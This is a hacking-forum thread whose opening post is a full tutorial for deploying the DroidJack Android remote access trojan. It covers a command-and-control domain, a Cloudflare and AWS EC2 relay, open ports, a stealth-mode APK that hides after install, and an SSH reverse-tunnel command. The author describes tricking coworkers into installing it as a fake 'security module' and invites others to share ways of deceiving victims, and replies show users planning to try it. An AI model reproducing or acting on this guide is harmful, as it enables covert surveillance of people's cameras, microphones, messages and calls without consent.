Android Remote Administration Tool – Full Setup
by Fotrax - June 26, 2020 at 09:55 PM
#1
Today, I will share with you all the setup I use for the deployment and monitoring of Android smartphones using DroidJack and the Amazon AWS infrastructure.

I will separate this tutorial by parts, so we can focus on each part more specifically and get into the details that make the difference in the deployment.



1 – Domain for Control

Honestly, I don't like to depend on dynamic DNS services like No-IP and DynDNS, because of that, I prefer to acquire a domain of my own and exclusive to control the RATs.

In this tutorial, we will use the domain "fotrax.me" as an example of the domain for the control of RATs.

To purchase the domain, we can use the Amazon AWS - Route 53 service, which offers a domain at low cost and with the possibility to anonymize the informations of the domain owner.

After acquiring the domain, you will need to configure a DNS server to control requests and define the IPs of your servers.

If you have any questions about acquiring the domain along Amazon AWS - Route 54, you can consult the proper documentation at the link below.

Route 53 - Doman Register Hidden Content
You must register or login to view this content.




2 – DNS Servers

Since we don't want to rely on dynamic DNS services, we will need to make our own DNS server to control our domain.

If you have advanced knowledge, you can set up your own VPS server with BIND, but I prefer to use CloudFlare for its ease.

Just register with CloudFlare, add your domain and configure DNS servers on Amazon AWS - Route 53, if you have any questions, follow the documentation below.

Out of personal preference, I don't like using the upper domain as a RAT control, so we should create a subdomain for control. For this reason, we created the subdomain "upstream.fotrax.me" to forward RAT requests.

CloudFlare - Add New Domain Hidden Content
You must register or login to view this content.




3 – Front Server

To avoid exposing our IP directly, we will use an Amazon AWS EC2 server to be our gatekeeper.

As our EC2 server will only serve to redirect requests to our DroidJack server, you can create a simple EC2 instance with AMI Linux 2. If you have any questions, just follow the documentation below.

If you have a new Amazon AWS account, you can have access to the Free Tier, which grants you 12 months of free use of EC2 for one instance, that is, our gatekeeper server will be free for one year.

EC2 - Get Started Hidden Content
You must register or login to view this content.




4 – Security Group

As Amazon AWS requires a release of each port that we will use, we will have to release the TCP ports to communicate with the DroidJack server

First you must define the port that you will use to control the RAT, in this example, I will use port 3389, which is commonly used for remote access on windows.

To communicate with the DroidJack server, we must release the command port, which will be 3389 and port 1337, which is the DroidJack standard file transfer port and we cannot change this.

To do this, you must release traffic from any IP (0.0.0.0/0) to TCP ports 3389 and 1337 to your EC2 server. If in doubt, follow the documentation specified below.

EC2 - Security Groups Hidden Content
You must register or login to view this content.




5 – Subdomain Configuration

Now, just take the IP of your EC2 instance and create an "A" record of subdomain in CloudFlare. Remember to create a DNS record on CloudFlare with the "gray cloud", as we don't want to hide our server's IP.

In this example, we will use the subdomain "upstream.fotrax.me" as our subdomain with the IP of our EC2 instance. For questions, follow the documentation below.

CloudFlare - DNS Records Hidden Content
You must register or login to view this content.




6 – Configuring the DroidJack

To install DroidJack, just download the file below and unzip the file on your computer. To execute the file, it is necessary to have Java JRE 8 properly installed.

To run DroidJack, simply access the folder that you unzipped the file in and run the "Droidjack.jar" file.

DroidJack - Mega Download Hidden Content
You must register or login to view this content.




7 – Creating the RAT

To create the file responsible for remote access on Android, just run DroidJack, access the "Generate APK" tab and fill in the requested information.

App Name: Enter the name you want the application to show the user.

File Name: Enter the name of the file you want to be exported.

Dynamic DNS: Enter our subdomain previously configured for RAT control, in this case "upstream.fotrax.me".

Port Number: Insert the port for RAT control, in this example, we use port 3389.

Stealth Mode: Activate this option, which will hide the application after installed on the victim's smartphone.

Custom Icon: If you wish, you can select an icon to be displayed in the application.

Bind with Another APK: You can also "merge" the RAT with another application... I have never tested this option.

After filling all this information, just select the Generate option and your RAT will be exported. I had some problems to export the APK using Mac OS, but I tested it on my Windows 7 and exported without any problems.

[Image: iuh6mGV.jpg]



8 – Social Engineering

Now we have the most complicated part of all, we have to use our social engineering to convince others to install the APK with the RAT.

In my case, I placed the APK in the domain of the company I work for and sent an email to all employees informing that it would be mandatory to download the installation of our new "security module" to access the system.

Many people installed without questioning anything and others had difficulties to install and came to my office to request to install this security module.

I ask you to share other ways that you use to persuade people to install an APK on their smartphone without much questioning.



9 – Accessing our Server

Before everything works, we must redirect the ports we want to our computer. For this, we will use port forwarding through SSH.

For this, we need to know the internal IP of our computer, which in my case will use 192.168.0.100 as an example.

Now just open a terminal and open an SSH session with the following arguments.

Remember to change the IP "192.168.0.100" for your internal IP, change the domain "upstream.fotrax.me" for your subdomain and change the file "awskey.pem" for your EC2 instance access key .

ssh -R 3389:192.168.0.100:3389 -R 1334:192.168.0.100:1334 [email protected] -i awskey.pem



10 – Making it Work

Now just open your DroidJack on the "Devices" tab, set the listening port to 3389 and activate reception.

Enjoy and have fun accessing smartphone cameras remotely, listening to the audio of the environment, recording videos remotely, reading messages, viewing calls and even viewing the browsing history.

[Image: nep2yFa.jpg]



Did you like the content? Leave a Reputation + to me!
Did you have any doubts? Leave it there and see if I can help you!

And if you have already implemented this, leave your social engineering strategy for installing the APK.
Reply
#2
Hellow, somebody tested?
Reply
#3
thanks for share i will test it
but i think droidjack stoped
This forum account is currently banned. Ban Length: Permanent (N/A).
Ban Reason: Hit Stealers and Malware
Reply
#4
(July 10, 2020 at 01:50 PM)LORAN Wrote: thanks for share i will test it
but i think droidjack stoped

I'm using it normally... Something I noticed is that DroidJack has a little bit of instability in the latest versions of Android, but in versions before Android 8.0 it is working normally!
Reply
#5
(July 10, 2020 at 02:12 PM)Fotrax Wrote:
(July 10, 2020 at 01:50 PM)LORAN Wrote: thanks for share i will test it
but i think droidjack stoped

I'm using it normally... Something I noticed is that DroidJack has a little bit of instability in the latest versions of Android, but in versions before Android 8.0 it is working normally!

i want to ask how to rat unlocal devices
cuz every tool i use i just access the local devices 
i used no ip and didnt work do you have any idea?
This forum account is currently banned. Ban Length: Permanent (N/A).
Ban Reason: Hit Stealers and Malware
Reply
#6
Thank you for the outline. Interesting. Will try it.
Reply
#7
Thank you for sharing, I will try it, hopefully there will be no problems
Reply
#8
Tnx for sharing this with us :D
Reply
#9
(July 10, 2020 at 07:57 PM)LORAN Wrote:
(July 10, 2020 at 02:12 PM)Fotrax Wrote:
(July 10, 2020 at 01:50 PM)LORAN Wrote: thanks for share i will test it
but i think droidjack stoped

I'm using it normally... Something I noticed is that DroidJack has a little bit of instability in the latest versions of Android, but in versions before Android 8.0 it is working normally!

i want to ask how to rat unlocal devices
cuz every tool i use i just access the local devices 
i used no ip and didnt work do you have any idea?

If you follow the structure I showed in the tutorial, you can use the RAT on local and remote devices.

Using No-IP is a little tricky because you have no control over your ISP's port filtering and sometimes they may be using a Carrier Grade NAT, which makes it totally impossible for you to use a dynamic DNS pointing for your IP.

The structure I used in the tutorial above was to circumvent these difficulties imposed by some internet providers.

Try to implement the scenario I showed you and, if you have any difficulties with something, let me know and I will help you as possible.
Reply
#10
I will try tutorial. Thx for sharing.... Im tested now... Thz
Reply
#11
perfect to learn new thing
Reply
#12
Good read indeed, like to hear such experiences
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
Botnet Setup | RAT Setup | Stealers ( Free Support ) Found 16 6,024 April 24, 2021 at 12:09 PM
Last Post: Vormixx

 Users browsing this thread: 1 Guest(s)